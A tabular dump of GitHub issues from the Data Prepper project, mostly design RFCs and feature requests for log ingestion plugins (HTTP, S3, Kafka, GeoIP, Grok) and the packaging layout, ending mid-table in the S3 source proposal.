issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 262k ⌀ | issue_title stringlengths 1 1.02k | issue_comments_url stringlengths 53 116 | issue_comments_count int64 0 2.49k | issue_created_at stringdate 1999-03-17 02:06:42 2025-06-23 11:41:49 | issue_updated_at stringdate 2000-02-10 06:43:57 2025-06-23 11:43:00 | issue_html_url stringlengths 34 97 | issue_github_id int64 132 3.17B | issue_number int64 1 215k |
|---|---|---|---|---|---|---|---|---|---|
[
"opensearch-project",
"data-prepper"
] | We will add a log-http-source Source plugin. This issue tracks the following features:
* Boiler plate plugin code
* Add basic http server
* Add the HTTP service that parses the incoming HTTP request data and pushes it to the buffer
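Conceptually, the third feature boils down to parsing a request body into records and handing them to the buffer. An illustrative Python sketch (Data Prepper itself is Java; the function name, JSON-array body shape, and status codes here are assumptions, not the plugin's actual API):

```python
import json
from queue import Queue

def handle_log_request(body: bytes, buffer: Queue) -> int:
    """Parse an incoming HTTP request body as a JSON array of log
    records and push each record into the buffer. Returns an HTTP
    status code: 200 on success, 400 on malformed input."""
    try:
        records = json.loads(body)
    except json.JSONDecodeError:
        return 400
    if not isinstance(records, list):
        return 400
    for record in records:
        buffer.put(record)
    return 200
```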
| Basic log HTTP source plugin | https://api.github.com/repos/opensearch-project/data-prepper/issues/308/comments | 1 | 2021-09-23T18:30:24Z | 2021-10-12T14:39:00Z | https://github.com/opensearch-project/data-prepper/issues/308 | 1,005,728,692 | 308 |
[
"opensearch-project",
"data-prepper"
] | ## What kind of business use case are you trying to solve? What are your requirements?
When ingesting logs into OpenSearch for log analytics, users would like to use FluentBit as the client-side application log collector and expect Data Prepper to receive log data from the FluentBit HTTP output, transform it, and export it to OpenSearch and Amazon Elasticsearch Service. We would therefore like to present customers with a reliable FluentBit-DataPrepper-OpenSearch pipeline that supports the essential configuration and features for log data ingestion.
### What is the problem? What is preventing you from meeting the requirements?
The log HTTP source plugin is the receiver component of the [Data-Prepper log analytics pipeline](TODO: link for log ingestion RFC) workflow; it communicates with FluentBit or other HTTP clients and passes the received data downstream for further processing.
### What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
For Data Prepper to receive log requests from FluentBit, we will implement a log HTTP source plugin that satisfies the following functional requirements:
* The plugin shall be capable of receiving requests from the FluentBit HTTP output plugin.
* The plugin shall support the JSON format from the FluentBit HTTP output plugin.
* The plugin shall be configurable via YAML, similar to other existing source plugins in Data Prepper.
* The plugin shall push data to buffer in a unified format/model that
* facilitates the downstream preppers to do data-processing and transformation
* allows sinks to post to backend (Happy path).
* The plugin shall support host verification (TLS/SSL)
and performance requirements:
* The source plugin should manage thread pool counts, max connection counts, etc.
* The source plugin should throttle gracefully.
The HTTP source plugin will include the following configuration parameters:
* port [int] (Optional) - The port number the source plugin listens on. Defaults to 2021.
* threadCount [int] (Optional) - The number of threads in the HTTP request executor thread pool. Defaults to a maximum of 200 threads.
* maxConnectionCount [int] (Optional) - The maximum allowed number of open connections. Defaults to 256.
* maxPendingRequests [int] (Optional) - The maximum number of incoming requests to hold in a temporary task queue for processing by worker threads. If a request arrives while the queue is full, a 429 response is returned immediately. Defaults to 1024.
* ssl [bool] (Optional) - A boolean that enables TLS/SSL security verification. Defaults to false.
* certFilePath [String] (Optional) - Required when the ssl flag is true.
* privateKeyFilePath [String] (Optional) - Required when the ssl flag is true.
* privateKeyPassword [String] (Optional) - Required when the ssl flag is true.
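The maxPendingRequests throttling described above can be sketched with a bounded queue. This is an illustrative Python sketch under assumed semantics (Data Prepper is Java; class and method names here are hypothetical), showing rejection with 429 once the pending-task queue fills:

```python
from queue import Queue, Full

class RequestThrottler:
    """Rejects work immediately with HTTP 429 once the pending-task
    queue is full, instead of blocking the caller."""
    def __init__(self, max_pending_requests: int = 1024):
        self.pending = Queue(maxsize=max_pending_requests)

    def submit(self, request) -> int:
        try:
            self.pending.put_nowait(request)
        except Full:
            return 429  # Too Many Requests
        return 202  # accepted for asynchronous processing by workers
```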
### What are your assumptions or prerequisites?
* The log data received in each HTTP request is complete, i.e. for a multiline log, it is assumed to appear in a single request body rather than scattered across multiple requests. This assumption is based on FluentBit's support for multiline filtering (https://docs.fluentbit.io/manual/pipeline/filters/multiline-stacktrace).
* For the initial implementation, we will only handle the JSON content type. More codecs can be supported as enhancements later on.
### What are the remaining open questions?
Batched log requests are submitted to the log HTTP source's buffer without unwrapping the contents. Both approaches (unwrapping or not) have pros and cons. We will address the data model and buffering behavior enhancements in a separate issue.
| [RFC] Log HTTP source Plugin | https://api.github.com/repos/opensearch-project/data-prepper/issues/307/comments | 1 | 2021-09-23T18:26:18Z | 2021-10-19T15:35:11Z | https://github.com/opensearch-project/data-prepper/issues/307 | 1,005,725,698 | 307 |
[
"opensearch-project",
"data-prepper"
] | This RFC introduces a proposal for log ingestion in Data Prepper.
## What kind of business use case are you trying to solve? What are your requirements?
Users would like to support processing unstructured log data and storing structured output in OpenSearch.
*Use Cases:*
1. As a user, I want to be able to send data from FluentBit to Data Prepper to be processed before ingest into OpenSearch.
2. As a user, I want to convert unstructured log lines into a structured data format to ingest into OpenSearch.
### What is the problem? What is preventing you from meeting the requirements?
OpenSearch does not support the processing of unstructured data prior to saving the data to the index. There are numerous open source projects that support log ingestion; however, users are looking for an OpenSearch-native solution.
### What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
We will build HTTP/S source and Grok prepper plugins for Data Prepper. The HTTP/S plugin will support handling JSON data. We will build a new Grok prepper plugin to convert unstructured log lines into structured data. We will build a new internal model to improve existing system performance and extend the OpenSearch sink to support structured log data.
[Image: FluentBit and Grok Plugin-Proposed System Overview.jpg]
#### HTTP Source Plugin
This plugin will be responsible for receiving requests from a user's FluentBit clients. This plugin will accept JSON formatted data initially with the flexibility to add other data formats in the future.
#### Internal Model
We will migrate away from using serialized JSON Strings as our internal data structure and define a new internal model. This will improve our system’s performance by removing excessive de/serialization (something we are currently experiencing as part of the trace pipelines) while keeping the current flexibility of our existing design.
#### Grok Prepper Plugin
The grok filtering functionality will be supported through a new grok prepper plugin. This prepper will process the collection of records from the FluentBit source plugin and filter them according to the Data Prepper grok configuration.
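Conceptually, a grok pattern compiles down to a regular expression with named capture groups. This is a heavily simplified illustrative sketch in Python (the actual plugin would use the java-grok library and full `%{SYNTAX:SEMANTIC}` pattern syntax; the pattern below only approximates COMMONAPACHELOG):

```python
import re

# A simplified stand-in for a grok pattern: named capture groups
# play the role of grok's %{SYNTAX:SEMANTIC} captures.
APACHE_LIKE = re.compile(
    r'(?P<clientip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<verb>\S+) (?P<request>\S+) \S+" (?P<response>\d{3}) (?P<bytes>\d+)'
)

def grok_match(record: dict, pattern=APACHE_LIKE) -> dict:
    """On a match, merge the captured fields into the record,
    mimicking grok's capture behavior; otherwise return it unchanged."""
    m = pattern.match(record.get("message", ""))
    if m:
        record.update(m.groupdict())
    return record
```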
#### Sink
The Data Prepper OpenSearch sink configuration will be extended to support structured log data, as it currently only supports raw trace data and service map data.
### What are your assumptions or prerequisites?
We elected to support Fluent Bit and grok because they are widely used features for exporting and transforming log data. Other logs sources (FluentD, Beats, etc.) and processing functionality (dropping data, mutating, etc.) are out of scope at this time. We plan to expand support for other plugins based on feedback from the community.
Detailed designs for each section will be proposed in separate RFCs.
This aligns with the most recent [blog post](https://opensearch.org/blog/releases/2021/09/data-prepper-roadmap/)
| [RFC] Log Ingestion for Data Prepper | https://api.github.com/repos/opensearch-project/data-prepper/issues/306/comments | 0 | 2021-09-23T15:13:21Z | 2021-10-19T14:24:01Z | https://github.com/opensearch-project/data-prepper/issues/306 | 1,005,554,303 | 306 |
[
"opensearch-project",
"data-prepper"
] | This RFC introduces a change from distributing Data Prepper as an uber-jar into a bundled directory structure. This approach is similar to how OpenSearch is distributed.
## What is the problem? What is preventing you from meeting the requirements?
Data Prepper distributes its code in a single uber-jar. We are planning work to support extending Data Prepper with custom plugins. This requires that we have a location for loading additional jar files which are not part of the uber-jar. Additionally, those plugins will be decoupled from data-prepper-core, which means we will have multiple jar files.
## What are you proposing? What do you suggest we do to solve the problem or improve the existing situation?
We propose distributing Data Prepper as a bundle which must be extracted into a directory structure. Data Prepper will now include a shell script for starting Java with the required classpath.
### User Experience
Users can deploy Data Prepper using the following options:
* Run the Docker container
* Install Bundled Distribution
* Build from source
#### Docker
Users deploying using Docker currently run the following commands.
```
docker pull opensearchproject/data-prepper:latest
docker run --name data-prepper --expose 21890 -v /full/path/to/pipelines.yaml:/usr/share/data-prepper/pipelines.yaml -v /full/path/to/data-prepper-config.yaml:/usr/share/data-prepper/data-prepper-config.yaml opensearchproject/data-prepper:latest
```
This proposal will slightly alter the process by changing the destination paths of the mounted files.
| Original Destination | Updated Destination |
| -------------------------------------------------- | --------------------------------------------------------- |
| /usr/share/data-prepper/pipelines.yaml | /usr/share/data-prepper/pipelines/pipelines.yaml |
| /usr/share/data-prepper/data-prepper-config.yaml | /usr/share/data-prepper/config/data-prepper-config.yaml |
The new commands will be:
```
docker pull opensearchproject/data-prepper:latest
docker run --name data-prepper --expose 21890 -v /full/path/to/pipelines.yaml:/usr/share/data-prepper/pipelines/pipelines.yaml -v /full/path/to/data-prepper-config.yaml:/usr/share/data-prepper/config/data-prepper-config.yaml opensearchproject/data-prepper:latest
```
#### Install Bundled Distribution
Users who install the current bundled distribution get a single uber-jar. Because this uber-jar has everything bundled, users run Data Prepper with the following command.
```
java -jar data-prepper-core-$VERSION.jar pipelines.yaml data-prepper-config.yaml
```
With the proposed update, users will install Data Prepper by performing steps similar to the following.
```
cd path/to/parent/directory
wget https://.../path/to/data-prepper-$VERSION.tar.gz
tar -xf data-prepper-$VERSION.tar.gz
```
Users can then run Data Prepper with the following commands.
```
cd data-prepper-$VERSION
bin/data-prepper
```
### Proposed Structure
Below is the initial directory structure which this change will introduce.
```
data-prepper-$VERSION/
bin/
data-prepper # Shell script to run Data Prepper on Linux/macOS
config/
data-prepper-config.yaml # The Data Prepper configuration file
log4j.properties # Logging configuration
pipelines/ # New directory for pipelines
trace-analytics.yaml
log-ingest.yaml
lib/
data-prepper-core.jar
... any other jar files
logs/ # Directory for log output
LICENSE
NOTICE
README.md
```
The proposed structure is similar to OpenSearch’s directory structure.
## What are your assumptions or prerequisites?
This RFC is limited in scope to the change to deploying with a directory structure. It does not include details for any features which depend on this.
Future features may expand the proposed directory structure. This approach does not attempt to foresee every possible directory.
Users still continue to provide the pipeline configuration file to Data Prepper as a command-line argument.
We expect that users only need to run Data Prepper on Linux. This proposal does not include a Windows script, which would likely be `bin/data-prepper.bat`. However, this could be included into this approach if requested.
## Additional changes
In addition to deploying with a directory structure, this proposal includes other related changes.
* Data Prepper can read the config file located at `config/data-prepper-config.yaml` rather than require it as a command-line argument.
* Data Prepper will expose the Log4j logging configuration file. This can be a clearer approach than requiring users to override a Java property.
* Data Prepper will write logs to the `logs/` directory.
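The config-file fallback in the first bullet could behave like the following illustrative sketch (hypothetical argument handling; the real startup logic is not specified here):

```python
from pathlib import Path

# Default location inside the extracted bundle, per the structure above.
DEFAULT_CONFIG = Path("config/data-prepper-config.yaml")

def resolve_config_path(cli_args: list) -> Path:
    """Prefer a config file passed as the second command-line
    argument (legacy `java -jar ... pipelines.yaml config.yaml`
    behavior); otherwise fall back to the bundled default location."""
    if len(cli_args) >= 2:
        return Path(cli_args[1])
    return DEFAULT_CONFIG
```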
# Tasks
- [x] #1655
- [x] Update archive structure to include script
- [x] Break apart `data-prepper-core` and deploy jar files in to `lib/` directory
- [x] Add `data-prepper-main`
- [x] #1728
- [x] #1736
- [x] Update smoke tests to copy configuration files and pipelines to the correct locations
- [x] #1762
- [x] #1785
- [x] #1795
| [RFC] Directory Structure for Data Prepper | https://api.github.com/repos/opensearch-project/data-prepper/issues/305/comments | 1 | 2021-09-22T14:52:48Z | 2022-09-29T18:25:53Z | https://github.com/opensearch-project/data-prepper/issues/305 | 1,004,395,250 | 305 |
[
"opensearch-project",
"data-prepper"
] | This is a subtask of the issue for a grok processor: https://github.com/opensearch-project/data-prepper/issues/256.
Basic pattern matching and capture functionality will be added to the Grok Prepper using the existing Java grok library: https://github.com/thekrakken/java-grok | Grok Prepper Basic Matching | https://api.github.com/repos/opensearch-project/data-prepper/issues/304/comments | 0 | 2021-09-21T17:52:08Z | 2021-10-18T20:29:01Z | https://github.com/opensearch-project/data-prepper/issues/304 | 1,002,960,073 | 304 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
It would be nice to be able to ingest firewall logs into OpenSearch for Observability / SIEM-related activities.
**Describe the solution you'd like**
A firewall log source plugin that accepts firewall logs and normalizes them.
**Describe alternatives you've considered (Optional)**
N/A
**Additional context**
See [this](https://discuss.opendistrocommunity.dev/t/cisco-asa-firewall-message-ingestion/4131) discussion for more detail.
| Firewall Log Ingest | https://api.github.com/repos/opensearch-project/data-prepper/issues/303/comments | 0 | 2021-09-21T17:09:23Z | 2022-04-19T19:34:35Z | https://github.com/opensearch-project/data-prepper/issues/303 | 1,002,889,435 | 303 |
[
"opensearch-project",
"data-prepper"
This is a subtask of the issue for a grok processor: https://github.com/opensearch-project/data-prepper/issues/256.
Grok prepper field names and default values need to be set up, as well as the reading of the configuration and boilerplate for implementing AbstractPrepper. | Grok Prepper Configuration and Boilerplate | https://api.github.com/repos/opensearch-project/data-prepper/issues/301/comments | 0 | 2021-09-21T16:27:44Z | 2021-10-13T15:27:46Z | https://github.com/opensearch-project/data-prepper/issues/301 | 1,002,819,350 | 301 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
We, like thousands of other organisations, use proxies to filter outbound internet traffic. Without proxy support, `data-prepper` is unusable in our environment.
**Describe the solution you'd like**
Ideally, I could use `-Dhttp.proxyHost` and other Java proxy properties on the command line like most Java applications. Failing that, support via configuration (e.g., `data-prepper-config.yaml`) would be OK.
**Describe alternatives you've considered (Optional)**
There are no alternatives for our environment. I'm actually really surprised Amazon is recommending this tool without this basic feature. If this support exists, documentation for using it is nonexistent.
| Support Proxies | https://api.github.com/repos/opensearch-project/data-prepper/issues/300/comments | 5 | 2021-09-21T03:45:30Z | 2021-10-29T18:14:52Z | https://github.com/opensearch-project/data-prepper/issues/300 | 1,001,783,437 | 300 |
[
"opensearch-project",
"data-prepper"
] | **Is your feature request related to a problem? Please describe.**
Data Prepper configuration names inconsistently use snake_case or lowerCamelCase. Configuring Data Prepper is clearer when the naming convention is consistent.
**Describe the solution you'd like**
Most importantly Data Prepper should have a consistent naming convention for configuration names. The standard we are proposing is snake_case. This convention is used by most of the existing properties. Thus, users will have fewer properties to reconfigure.
Data Prepper will need to:
* Have documentation clearly stating the standard.
* Provide a migration for names which are not in compliance. The first part of this migration is adding snake_case properties for each camelCase property. The existing camelCase properties will remain as deprecated properties. The next major release of Data Prepper will remove the camelCase versions.
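The deprecation-window behavior could work roughly like this illustrative Python sketch (Data Prepper is Java; function names and the precedence rule are assumptions): legacy camelCase keys are accepted as aliases, and an explicit snake_case key wins over its camelCase duplicate.

```python
import re

def to_snake_case(name: str) -> str:
    """Convert lowerCamelCase to snake_case, e.g. threadCount -> thread_count."""
    return re.sub(r'(?<=[a-z0-9])([A-Z])',
                  lambda m: '_' + m.group(1).lower(), name)

def migrate_settings(settings: dict) -> dict:
    """Accept both spellings during the deprecation window."""
    migrated = {}
    for key, value in settings.items():
        migrated.setdefault(to_snake_case(key), value)
    # Apply snake_case keys last so they override camelCase duplicates.
    for key, value in settings.items():
        if key == to_snake_case(key):
            migrated[key] = value
    return migrated
```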
**Tasks**
- [x] #2184
- [ ] #2202
- [x] #2203 | Configuration Consistency | https://api.github.com/repos/opensearch-project/data-prepper/issues/291/comments | 1 | 2021-09-17T22:08:41Z | 2023-02-27T19:58:30Z | https://github.com/opensearch-project/data-prepper/issues/291 | 999,753,902 | 291 |
[
"opensearch-project",
"data-prepper"
] | We are building support for customers to ingest and process log data through Data Prepper. We have identified a need for a plugin to output data from Data Prepper to Amazon Elasticsearch Service / OpenSearch (AES/OS). This task tracks the plan for a new Sink plugin to help output logging data from Data Prepper to OpenSearch. | Dataprepper Amazon Elasticsearch Service / OpenSearch Sink: | https://api.github.com/repos/opensearch-project/data-prepper/issues/260/comments | 0 | 2021-09-06T15:45:14Z | 2021-11-22T18:11:45Z | https://github.com/opensearch-project/data-prepper/issues/260 | 989,290,371 | 260 |
[
"opensearch-project",
"data-prepper"
] | The goal is to take an existing Logstash configuration file, plug it into Data Prepper, and perform identical transformations on the data being ingested by the Data Prepper log pipeline. | Logstash Template support: | https://api.github.com/repos/opensearch-project/data-prepper/issues/259/comments | 0 | 2021-09-06T15:45:09Z | 2021-11-15T20:22:00Z | https://github.com/opensearch-project/data-prepper/issues/259 | 989,290,317 | 259 |
[
"opensearch-project",
"data-prepper"
] | The getting started documentation needs to be better written and easier to understand so that getting data prepper up and running is very simple. | Rework getting started documentation | https://api.github.com/repos/opensearch-project/data-prepper/issues/258/comments | 0 | 2021-09-06T15:44:08Z | 2021-11-18T14:18:26Z | https://github.com/opensearch-project/data-prepper/issues/258 | 989,289,695 | 258 |
[
"opensearch-project",
"data-prepper"
] | We need to define the naming conventions that we will use to send data to the indices for log analysis in the observability plugin. | Define the log output naming conventions that will be used by Observability dashboard. | https://api.github.com/repos/opensearch-project/data-prepper/issues/257/comments | 0 | 2021-09-06T15:42:37Z | 2022-04-19T20:28:50Z | https://github.com/opensearch-project/data-prepper/issues/257 | 989,288,755 | 257 |
[
"opensearch-project",
"data-prepper"
] | null | Create a Grok processor. | https://api.github.com/repos/opensearch-project/data-prepper/issues/256/comments | 0 | 2021-09-06T15:27:42Z | 2021-11-15T20:20:20Z | https://github.com/opensearch-project/data-prepper/issues/256 | 989,279,113 | 256 |
[
"opensearch-project",
"data-prepper"
] | Accept data from FluentBit -- probably need to create an HTTP input source. | Accept data from FluentBit. | https://api.github.com/repos/opensearch-project/data-prepper/issues/255/comments | 1 | 2021-09-06T15:26:51Z | 2021-10-13T15:27:34Z | https://github.com/opensearch-project/data-prepper/issues/255 | 989,278,557 | 255 |
[
"opensearch-project",
"data-prepper"
] | Data Prepper can receive events from Kafka using a source which acts as a Kafka consumer.
This source should support most or all of the [consumer configurations](https://kafka.apache.org/25/documentation.html#consumerconfigs).
It should be able to support deserializing objects directly into Events. With the `StringDeserializer`, it can create an Event with a single field, say `message`, with the string as the value. It could possibly have a JSON-based deserializer which maps JSON data directly into the fields of the Event. | Accept data from Kafka | https://api.github.com/repos/opensearch-project/data-prepper/issues/254/comments | 3 | 2021-09-06T15:25:31Z | 2023-08-16T21:03:39Z | https://github.com/opensearch-project/data-prepper/issues/254 | 989,277,671 | 254 |
[
"opensearch-project",
"data-prepper"
] | Provide a new processor which can enrich Data Prepper events with location information using a provided IP address.
The minimal configuration is to provide a `source_key` with the JSON Pointer key path.
```
processor:
- geoip:
source_key: "peer/ip"
```
Additionally, this plugin should be able to use either a MaxMind [GeoIP Lite2](https://dev.maxmind.com/geoip/geolite2-free-geolocation-data?lang=en) database or the [GeoIP2 Commercial Licensing](https://www.maxmind.com/en/solutions/geoip2-enterprise-product-suite/commercial-licensing) database. The Data Prepper author must provide information for configuring the commercial license.
The pipeline author can also specify an optional `target_key` property to specify where the location fields are written. By default, this will be the root of the event.
### Example 1 - Minimal Configuration
```
processor:
- geoip:
source_key: "peer/ip"
```
Input Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
```
Output Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
"country" : "United States"
"city_name" : "Seattle"
"latitude" : 47.64097
"longitude" : 122.25894
"zip_code" : "98115"
```
### Example 2 - Target Key
```
processor:
- geoip:
source_key: "peer/ip"
target_key: "location"
```
Input Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"status" : "success"
```
Output Event:
```
"peer" : {
"ip" : "1.2.3.4"
"host" : "example.org"
}
"location" : {
"status" : "success"
"country" : "United States"
"city_name" : "Seattle"
"latitude" : "47.64097"
"longitude" : "122.25894"
"zip_code" : "98115"
}
```
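The key-path lookup and `target_key` behavior illustrated above could be sketched as follows (illustrative Python; the `lookup` dict stands in for a MaxMind database query, and all names are assumptions, not the processor's actual implementation):

```python
def enrich_with_geoip(event: dict, source_key: str, target_key: str = None,
                      lookup: dict = None) -> dict:
    """Enrich an event with location fields for the IP found at
    source_key (a slash-separated key path such as "peer/ip")."""
    lookup = lookup or {}
    # Walk the slash-separated key path into the event.
    value = event
    for part in source_key.split("/"):
        if not isinstance(value, dict) or part not in value:
            return event  # nothing to enrich
        value = value[part]
    location = lookup.get(value)
    if location is None:
        return event  # IP not found in the database
    if target_key:
        event[target_key] = dict(location)
    else:
        event.update(location)  # default: write to the root of the event
    return event
```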
- [x] #3941
- [x] #3942
| Add a GeoIP processor. | https://api.github.com/repos/opensearch-project/data-prepper/issues/253/comments | 4 | 2021-09-06T15:25:26Z | 2024-03-21T21:05:57Z | https://github.com/opensearch-project/data-prepper/issues/253 | 989,277,610 | 253 |
[
"opensearch-project",
"data-prepper"
] | Support ingest of OTel log data.
Specification: https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/logs/overview.md | Accept OTel log data from the OTel Collector | https://api.github.com/repos/opensearch-project/data-prepper/issues/252/comments | 1 | 2021-09-06T15:24:28Z | 2023-01-28T15:22:33Z | https://github.com/opensearch-project/data-prepper/issues/252 | 989,276,886 | 252 |
[
"opensearch-project",
"data-prepper"
] | ## Use-Case
Many users have external systems which write their logs to Amazon S3. These users want to use OpenSearch to analyze these logs. Data Prepper is an ingestion tool which can aid teams in extracting these logs from S3 and sending them to OpenSearch or elsewhere.
This proposal is to receive events from S3 notifications, read the objects from S3, and create Log Events from their contents.
## Basic Configuration
This plugin will be a single source plugin which:
* Polls a configured SQS standard queue which should hold S3 Event messages.
* Reads S3 objects which the message indicates as created.
* Uses a configured codec to parse the S3 object into Log Events.
* Writes the Log Events into the Data Prepper buffer.
The following example shows what a basic configuration would look like.
```
source:
s3:
notification_type: sqs
sqs:
queue_url: "https://sqs.us-east-2.amazonaws.com/123456789012/MyS3EventQueue"
codec:
single-line:
processor:
grok:
match:
message: [ "%{COMMONAPACHELOG}" ]
```
## Detailed Process
The S3 Source will start a new thread for reading from S3. (The number of threads can be configured).
This thread will perform the following steps repeatedly until shutdown:
1. Use the SQS `ReceiveMessage` API to receive messages from SQS.
2. For each Message from SQS, it will:
a. Parse the Message as an S3Event.
b. Download the S3 Object which the S3Event indicates was created.
c. Decompress the object if configured to do so.
d. Parse the decompressed file using the configured `codec` into a list of `Log` `Event` objects.
e. Write the `Log` objects into the Data Prepper buffer.
3. Perform a `DeleteMessageBatch` with all of the messages which were successfully processed.
4. Repeat
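The loop above can be sketched as follows. This is an illustrative Python sketch using boto3-style method names on an injected client (so a stub works in place of a real AWS connection); the reader and codec callables are likewise assumptions, and failure handling is simplified to a blanket catch:

```python
import json

def poll_once(sqs_client, s3_reader, codec, buffer, queue_url, max_messages=10):
    """One iteration of the polling loop: receive messages, process
    each, then batch-delete only the messages that were fully
    processed. `s3_reader(bucket, key)` downloads an object body and
    `codec(body)` turns it into log events."""
    response = sqs_client.receive_message(
        QueueUrl=queue_url, MaxNumberOfMessages=max_messages)
    successes = []
    for message in response.get("Messages", []):
        try:
            s3_event = json.loads(message["Body"])
            for record in s3_event["Records"]:
                bucket = record["s3"]["bucket"]["name"]
                key = record["s3"]["object"]["key"]
                body = s3_reader(bucket, key)
                for log_event in codec(body):
                    buffer.append(log_event)
            successes.append({"Id": message["MessageId"],
                              "ReceiptHandle": message["ReceiptHandle"]})
        except Exception:
            # Failed messages are excluded from the delete batch, so
            # they reappear on the queue and eventually hit the DLQ.
            pass
    if successes:
        sqs_client.delete_message_batch(QueueUrl=queue_url, Entries=successes)
    return len(successes)
```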
### Error Handling
The S3 Source will suppress exceptions which occur during processing. Any message which is not processed correctly will not be included in the `DeleteMessageBatch` request; thus, the message will appear in the SQS queue again. Data Prepper expects that the SQS queue is correctly configured with a DLQ or a MessageRetentionPeriod to prevent the queue from filling up with invalid messages.
## Codecs
The S3 Source will use configurable codecs to support multiple data formats in the S3 objects. Initially, two codecs are planned:
1. `single-line` - This is used for logs which should be separated by a newline.
2. `json` - A codec for parsing JSON logs
### Single Line
The `single-line` codec has no configuration items.
Below is an example S3 object.
```
POST /search
POST /index
PUT /document/12345
```
With `single-line`, the S3 source will produce 3 Events, each with the following structure.
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "POST /search"
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "POST /index"
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.log",
"message" : "PUT /document/12345"
```
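Conceptually, the `single-line` codec behaves like this illustrative Python sketch (function name and Event shape are assumptions based on the example above):

```python
def single_line_codec(bucket: str, key: str, body: str):
    """Split an S3 object body on newlines and wrap each non-empty
    line in an Event carrying the object's bucket and key."""
    return [{"bucket": bucket, "key": key, "message": line}
            for line in body.splitlines() if line]
```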
### JSON
The `json` codec supports reading a JSON file and will create Events for each JSON object in an array. This S3 plugin starts with the expectation that the incoming JSON is formed as a large JSON array of JSON objects. Thus, this codec will find the first JSON array in the document and output the objects within that array as Events.
Future iterations of this plugin could allow for more customization. One possibility is to use JSON Pointer. However, the first iteration should meet many use-cases and allows for streaming the JSON to support parsing large JSON objects.
Below is an example configuration. This configures the S3 Source to use the `json` codec.
```
s3:
codec:
json:
```
Given the following S3 Object:
```
{
"http_requests" : [
{ "status" : 200, "path" : "/search", "method" : "POST" },
{ "status" : 200, "path" : "/index", "method" : "POST" },
{ "status" : 200, "path" : "/document/12345", "method" : "PUT" }
]
}
```
The S3 source will output 3 Log events:
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/index", "method" : "POST" }
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/search", "method" : "POST" }
```
```
"bucket" : "my-bucket",
"key" : "application1/instance200/2022-05-11.json",
"message" : { "status" : 200, "path" : "/document/12345", "method" : "PUT" }
```
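The first-array search described above could be sketched as follows (illustrative Python; a real implementation would stream the JSON to handle large objects instead of loading it whole, and the names here are assumptions):

```python
import json

def json_codec(bucket: str, key: str, body: str):
    """Emit one Event per object in the first JSON array found by a
    depth-first walk of the parsed document."""
    def first_array(node):
        if isinstance(node, list):
            return node
        if isinstance(node, dict):
            for value in node.values():
                found = first_array(value)
                if found is not None:
                    return found
        return None

    items = first_array(json.loads(body)) or []
    return [{"bucket": bucket, "key": key, "message": item}
            for item in items]
```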
### Compression
The S3 Source will support three configurations for compression.
1. `none` - The object will be treated as uncompressed.
2. `gzip` - The object will be decompressed using the gzip decompression algorithm
3. `automatic` - The S3 Source will examine the object key to guess whether it is compressed. If the key ends with `.gz`, the S3 Source will attempt to decompress it using gzip. Other heuristics for detecting compressed files can be supported in future iterations.
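The three modes can be sketched in a few lines (illustrative Python; the suffix heuristic matches the description above, and the function name is an assumption):

```python
import gzip

def decompress(key: str, raw: bytes, compression: str = "none") -> bytes:
    """Apply the configured compression mode. In `automatic` mode,
    guess from the object key's suffix."""
    if compression == "automatic":
        compression = "gzip" if key.endswith(".gz") else "none"
    if compression == "gzip":
        return gzip.decompress(raw)
    return raw
```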
## Full Configuration Options
| Option | Type | Required | Description |
| ------------- | ------------- | ------------- | ------------- |
| notification_type | Enum: `sqs` | Yes | Only SQS is supported. SNS may be a future option |
| compression | Enum: `none`, `gzip`, `automatic` | No | Default is `none` |
| codec | Codec | Yes | See Codecs section above. |
| sqs.queue_url | String - URL | Yes | The queue URL of the SQS queue. |
| sqs.maximum_messages | Integer | No | Directly related to SQS input. Default is 10. |
| sqs.visibility_timeout | Duration | No | Directly related to SQS input. Default is TBD. |
| sqs.wait_time | Duration | No | Directly related to SQS input. Default is TBD. |
| sqs.poll_delay | Duration | No | An optional delay between iterations of the process. Default is 0 seconds. |
| sqs.thread_count | Integer | No | Number of threads polling S3. Default is 1. |
| region | String | Yes | The AWS Region. TBD. |
| sts_role_arn | String | No | Role used for accessing S3 and SQS |
| access_key_id | String | No | Static access to S3 and SQS |
| secret_key_id | String | No | Static access to S3 and SQS |
| buckets | String List | No | If provided, only read objects from the buckets provided in the list. |
| account_ids | String List | No | If provided, only read objects from the buckets owned by an accountId in this list. |
## S3 Events
The S3 Source will parse all SQS Messages according to the [S3 Event message structure](https://docs.aws.amazon.com/AmazonS3/latest/userguide/notification-content-structure.html).
The S3 Source will also filter out any event types which are not `s3:ObjectCreated:*`. These events will be silently ignored. That is, the S3 Source will remove them from the SQS queue and will not create Events for them.
Additionally, this source will have optional `buckets` and `account_ids` lists. If supplied by the pipeline author, Data Prepper will only read objects for S3 events matching those lists. For the `buckets` list, only S3 buckets in the list are used. For the `account_ids` list, only buckets owned by accounts with matching IDs are used. If these lists are not provided, Data Prepper will read from any bucket owned by the account ID of the SQS queue.
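The filtering described above could be sketched as follows (illustrative Python; this assumes the record-level `eventName` form, e.g. `ObjectCreated:Put`, and the bucket `ownerIdentity` field from the S3 event message structure):

```python
def should_process(record: dict, buckets=None, account_ids=None) -> bool:
    """Decide whether an S3 event record should be read: only
    ObjectCreated events pass, optionally restricted to the
    configured bucket names and owning account IDs."""
    if not record.get("eventName", "").startswith("ObjectCreated:"):
        return False
    bucket = record["s3"]["bucket"]
    if buckets is not None and bucket["name"] not in buckets:
        return False
    if account_ids is not None and \
            bucket.get("ownerIdentity", {}).get("principalId") not in account_ids:
        return False
    return True
```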
## AWS Permissions Needed
The S3 Source will require the following permissions:
| Action | Resource |
